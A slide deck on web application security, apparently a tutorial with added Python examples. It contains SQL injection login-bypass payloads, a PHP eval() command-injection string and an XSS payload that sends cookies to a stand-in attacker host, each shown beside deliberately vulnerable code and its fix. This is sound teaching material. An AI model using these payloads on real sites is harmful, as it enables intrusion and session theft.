1. Web Application Security
Vikas Thange
2. Topics
1 What is Web Security
2 Why Web Security?
3 Proxy Server – Paros Proxy
4 Web Vulnerability
5 Web Vulnerability Types
6 SQL Injection
7 Other Types
3. What is Web Security
1 Web application security is a branch of information security that deals specifically with the security of websites and web applications.
2 At a high level, web application security draws on the principles of application security but applies them specifically to Internet and web systems.
3 Typically web applications are developed using programming languages such as PHP, Java EE, Java, Python, Ruby, ASP.NET, C#, VB.NET or Classic ASP.
4. Why Web Security
1 We value our privacy.
2 We value our clients' important data.
3 We want to make everyone's web presence safer and better.
4 We must remember that it is the users who use the system.
5 Users can be good as well as bad.
5. Proxy Server
1 A proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers.
2 A client connects to the proxy server, requesting some service, such as a file, web page, or other resource, available from a different server.
3 The proxy server evaluates the request according to its filtering rules. If the request is validated by the filter, the proxy provides the resource.
6. Use of Proxy Server
1 To apply access policy to network services or content, e.g. to block undesired sites.
2 To log / audit usage, i.e. to provide company employee Internet usage reporting.
3 To bypass security / parental controls.
4 To scan transmitted content for malware before delivery.
5 To scan outbound content, e.g. for data leak protection.
6 To circumvent regional restrictions.
7. Paros Proxy Server Tool
8. Web Vulnerability
A vulnerability is a weakness which allows an attacker to reduce a system's information assurance: a weakness in a custom web application's architecture, design, configuration, or code.
9. Web Vulnerability Types
1 SQL Injection
2 Code Injection
3 XSS or Cross Site Scripting
4 CSRF or Cross Site Request Forgery
5 Session Security
6 Input Validation
10. How Bad is it?
Statistics source: Web Application Security Consortium (WASC), http://www.webappsec.org/projects/statistics/
13. SQL Injection: What is SQL Injection?
• It is a trick to inject a SQL query/command as input, possibly via web pages.
• Many web pages take parameters from the web user and make a SQL query to the database.
• Take, for instance, a user login: the web page takes the user name and password and makes a SQL query to the database to check whether the user has a valid name and password.
• With SQL injection, it is possible for us to send a crafted user name and/or password field that changes the SQL query and thus grants us something else.
14. SQL Injection: What do you need?
• A little SQL and programming knowledge
• No tool required
• Any web browser
• A SQL injection attack dictionary
15. SQL Injection: What should you look for?
• Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc.
• Sometimes HTML pages use the POST command to send parameters to another ASP page. Therefore you may not see the parameters in the URL. However, you can check the source code of the HTML and look for the "FORM" tag. You may find something like this in some HTML code:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between <FORM> and </FORM> has potential parameters that might be useful (exploit-wise).
16. SQL Injection: What if you can't find any page that takes input?
• Look for pages like ASP, JSP, CGI or PHP web pages. Try especially to find URLs that take parameters, like:
http://duck/index.asp?id=10
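The two slides above say to look for FORM tags, hidden fields and URLs that carry parameters. The Python script below, added here as an example and not part of the original deck, automates that enumeration over a saved HTML page: it lists every query parameter of the page URL and every field of every form (with the resolved target, the HTTP method and whether the field is hidden) as a candidate injection point. The page URL, the HTML and the login form are constructed sample input; the slide's own Search/search.asp form is embedded as one of them.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse


class FormParser(HTMLParser):
    """Collect every <form> with its action, method and named fields.
    HTMLParser lower-cases tag and attribute names and accepts unquoted
    attribute values, so old-style <FORM action=Search/search.asp> parses."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute without a value is stored as None
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
        elif tag in ("input", "textarea", "select") and self._current is not None:
            if a.get("name"):
                self._current["fields"].append({
                    "name": a["name"],
                    "type": (a.get("type") or "text").lower(),
                    "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def find_injection_points(page_url, page_html):
    """Return every place where user-controlled data reaches the server:
    the query parameters of the page URL plus every field of every form."""
    points = []
    for name, values in parse_qs(urlparse(page_url).query,
                                 keep_blank_values=True).items():
        points.append({"where": "url", "target": page_url, "method": "get",
                       "name": name, "value": values[0], "hidden": False})
    parser = FormParser()
    parser.feed(page_html)
    for form in parser.forms:
        # a relative action (Search/search.asp) is resolved against the page URL
        target = urljoin(page_url, form["action"]) if form["action"] else page_url
        for field in form["fields"]:
            points.append({"where": "form", "target": target,
                           "method": form["method"], "name": field["name"],
                           "value": field["value"],
                           "hidden": field["type"] == "hidden"})
    return points


# Constructed sample page: the slide's search form plus a hypothetical login form.
SAMPLE_URL = "http://duck/index.asp?id=10"
SAMPLE_HTML = """
<html><body>
<FORM action=Search/search.asp method=post>
  <input type=hidden name=A value=C>
  <input type=text name=q>
</FORM>
<form action="/login.asp" method="POST">
  <input name="username">
  <input type="password" name="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for p in find_injection_points(SAMPLE_URL, SAMPLE_HTML):
        flag = " (hidden)" if p["hidden"] else ""
        print(f'{p["method"].upper():4} {p["target"]}  {p["name"]}={p["value"]!r}{flag}')
```

Hidden fields are flagged separately because, as the next slide notes, they are the ones you have to edit in a saved copy of the page (or in a proxy such as Paros) rather than in the browser's address bar.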
17. SQL Injection: How do you test if it is vulnerable?
• Start with the single quote trick. Input something like:
hi' or 1=1--
into the login, the password, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
• If you must do this with a hidden field, just download the source HTML from the site, save it to your hard disk, and modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get logged in without any login name or password.
18. SQL Injection: But why ' or 1=1--?
• Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that links you to another page with the following URL:
http://duck/index.asp?category=food
• In the URL, category is the variable name and food is the value assigned to the variable. In order to do that, the ASP might contain the following code:
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
19. SQL Injection: But why ' or 1=1--?
• As we can see, our variable will be wrapped into v_cat and thus the SQL statement becomes:
SELECT * FROM product WHERE PCategory='food'
The query should return a result set containing one or more rows that match the WHERE condition, in this case food.
• Now assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now our variable v_cat equals "food' or 1=1-- ". If we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--
The injected quote closes the string the code opened, "or 1=1" makes the WHERE condition true for every row, and "--" turns the closing quote the code appends into a comment, so the query returns every product instead of only the food category.
E.g. (deliberately vulnerable practice sites): http://testasp.vulnweb.com/ http://www.altoromutual.com
20. SQL Injection: How to avoid SQL Injection?
• Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- input from users
- parameters from the URL
- values from cookies
For numeric values, convert to an integer before putting the value into the SQL statement, or use ISNUMERIC to check that it is numeric.
• Character filtering alone is fragile: a blacklist misses the encodings and cases its author did not think of. The reliable fix is to pass user data as bound parameters of a prepared statement, so that it is never parsed as SQL at all.
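The four slides above walk through one procedure: inject ' or 1=1-- into a login form and into the category parameter, see why the query changes, then fix the code. The Python/SQLite program below, added here as an example and not part of the original deck, reproduces that walk-through end to end against an in-memory database: the string-concatenating queries are transcriptions of the slide's ASP snippet, the payloads are the slide's own, and beside each vulnerable function is the parameterised (and, for the numeric id, cast-before-use) version the last slide recommends. The users and product tables and their rows are constructed sample data.

```python
import sqlite3

PAYLOAD = "hi' or 1=1--"            # the slide's single quote trick
CATEGORY_PAYLOAD = "food' or 1=1--" # the category variant from slide 19


def make_db():
    """Constructed sample data: a users table for the login example and the
    product table the ASP snippet queries."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 's3cret');
        CREATE TABLE product(id INTEGER, name TEXT, PCategory TEXT);
        INSERT INTO product VALUES (1, 'apple',  'food');
        INSERT INTO product VALUES (2, 'bread',  'food');
        INSERT INTO product VALUES (3, 'hammer', 'tools');
    """)
    return conn


# --- vulnerable: user input concatenated into the SQL text ----------------

def login_vulnerable(conn, user, pwd):
    sql = ("SELECT * FROM users WHERE username='" + user +
           "' AND password='" + pwd + "'")
    # with PAYLOAD in both fields the text after -- is a comment, leaving
    # WHERE username='hi' or 1=1, which is true for every row
    return conn.execute(sql).fetchall()


def products_vulnerable(conn, category):
    # transcription of: sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    sql = "SELECT * FROM product WHERE PCategory='" + category + "'"
    return conn.execute(sql).fetchall()


def product_by_id_vulnerable(conn, raw_id):
    # numeric parameter, no quotes at all: "3 or 1=1--" still works
    return conn.execute("SELECT * FROM product WHERE id=" + raw_id).fetchall()


# --- fixed: bound parameters; numeric input cast before it reaches SQL -----

def login_safe(conn, user, pwd):
    return conn.execute("SELECT * FROM users WHERE username=? AND password=?",
                        (user, pwd)).fetchall()


def products_safe(conn, category):
    # the payload is now compared literally against PCategory and matches nothing
    return conn.execute("SELECT * FROM product WHERE PCategory=?",
                        (category,)).fetchall()


def product_by_id_safe(conn, raw_id):
    pid = int(raw_id)   # ValueError for "3 or 1=1--": rejected before any SQL runs
    return conn.execute("SELECT * FROM product WHERE id=?", (pid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))          # alice's row: login bypassed
    print(login_safe(db, PAYLOAD, PAYLOAD))                # []
    print(products_vulnerable(db, CATEGORY_PAYLOAD))       # all three products
    print(products_safe(db, CATEGORY_PAYLOAD))             # []
    print(product_by_id_vulnerable(db, "3 or 1=1--"))      # all three products
```

SQLite accepts the same -- line comment as SQL Server, so the slide's payloads carry over unchanged; the difference between the two halves is only whether the database ever sees the user's text as part of the statement.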
21. SQL Injection: Where can I get more info?
• http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6
• http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
• http://www.owasp.org/asac/input_validation/sql.shtml
• http://www.sensepost.com/misc/SQLinsertion.htm
• http://www.digitaloffense.net/wargames01/IOWargames.ppt
• http://www.wiretrip.net/rfp/p/doc.asp?id=60&iface=6
• http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
22. Code Injection
• Code Injection is the general name for many types of attacks which depend on inserting code that is then interpreted by the application.
• Such an attack may be performed by adding strings of characters to a cookie or to argument values in the URI.
• This attack makes use of a lack of accurate input/output data validation, for example of:
1. the class of allowed characters (standard regular expression classes or custom)
2. the data format
3. the amount of expected data
4. for numerical input, its values
23. Code Injection
When a programmer uses the eval() function and operates on the data inside it, and that data may be altered by the attacker, then it is only one step away from Code Injection.
The example below shows the use of the eval() function:
$myvar = "varname";
$x = $_GET['arg'];
eval("\$$myvar = $x;");
The code above, which smells like a rose, may be used to perform a Code Injection attack, because the request value is pasted into the PHP source that eval() runs (with arg=1 the evaluated code is $varname = 1;).
Example: passing in the URI /index.php?arg=1; phpinfo()
While exploiting bugs like these, the attacker does not have to limit himself to a Code Injection attack. The attacker may, for example, attempt the Command Injection technique:
/index.php?arg=1; system('dir')
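The slide's eval() example transcribed to Python, added here as an example and not part of the original deck: exec() on a spliced-in request value behaves exactly like the PHP eval(), so the "1; phpinfo()" trick becomes "1; pwned = True", and an attacker-chosen call runs the same way system('dir') would (the demonstration calls __import__('math').pi instead of a shell command so it has no side effects). The two hardened versions treat the value as data, either by accepting only Python literals (ast.literal_eval) or by validating the expected format first. The function names and payloads are constructed for this example.

```python
import ast


def assign_vulnerable(arg):
    """Transcription of the PHP pattern: the request value is spliced into
    source text and executed, so '1; pwned = True' is two statements and
    '__import__(...)' is a call of the attacker's choosing."""
    scope = {}
    exec("varname = " + arg, {}, scope)
    return scope


def assign_safe(arg):
    """Treat the value as data: literal_eval accepts only literals (numbers,
    strings, lists, ...) and raises SyntaxError/ValueError on anything that
    would execute."""
    return {"varname": ast.literal_eval(arg)}


def assign_int(arg):
    """Strictest option when an integer is expected: validate the format
    (decimal digits only) before converting, as the SQL slides also advise."""
    if not arg.isdigit():
        raise ValueError("expected a decimal integer")
    return {"varname": int(arg)}


if __name__ == "__main__":
    print(assign_vulnerable("1"))                        # {'varname': 1}
    print(assign_vulnerable("1; pwned = True"))          # extra statement executed
    print(assign_vulnerable("__import__('math').pi"))    # attacker-chosen call executed
    for payload in ("1; pwned = True", "__import__('math').pi"):
        try:
            assign_safe(payload)
        except (SyntaxError, ValueError) as exc:
            print("rejected by literal_eval:", type(exc).__name__)
    print(assign_int("42"))
```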
24. Cross Site Scripting Flaw (XSS)
• Cross site scripting (XSS) attacks are a type of injection problem in which malicious scripts are injected into otherwise benign and trusted web sites.
• Cross site scripting flaws are the most prevalent flaw in web applications today.
• Cross site scripting attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user.
• To avoid XSS attacks we recommend validating input against a rigorous positive specification of what is expected.
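The last bullet above recommends a positive specification of the input; in practice that is paired with encoding on output, because not every field can be restricted to a tight pattern. The Python snippet below, added here as an example and not part of the original deck, shows both: an allow-list regex for a user name, a vulnerable page fragment that pastes user text straight into HTML beside the encoded version, and a link renderer that also restricts the URL scheme, since encoding alone does not stop a javascript: URL in an href attribute. The cookie-stealing payload and the attacker host are constructed for the example and point nowhere.

```python
import html
import re
from urllib.parse import urlparse

# Constructed payload: what slide 26 hints at, a script that ships the
# session cookie to an attacker-controlled host (the host is fictitious).
PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
           "+document.cookie</script>")

# Positive specification: a user name is 1-32 letters, digits or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(value):
    """Allow-list validation at the input boundary: anything that is not
    exactly a user name is rejected, so markup never gets stored."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError("invalid user name")
    return value


def render_greeting_vulnerable(name):
    # untrusted text pasted into HTML: the browser runs any <script> it contains
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    # output encoding for the HTML text context: < > & " ' become entities,
    # so the payload is displayed as text instead of executed
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_link_safe(url, text):
    """Attribute context: encode the value AND allow-list the scheme, because
    'javascript:alert(1)' contains nothing that html.escape would change."""
    if urlparse(url).scheme not in ("http", "https"):
        raise ValueError("URL scheme not allowed")
    return ('<a href="' + html.escape(url, quote=True) + '">'
            + html.escape(text, quote=True) + '</a>')


if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))   # script tag intact
    print(render_greeting_safe(PAYLOAD))         # &lt;script&gt;...
    print(render_link_safe("http://example.com/?a=1&b=2", "Example"))
```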
25. Client Server Architecture
26. Cross Site Scripting Flaw (XSS): session ID, cookies.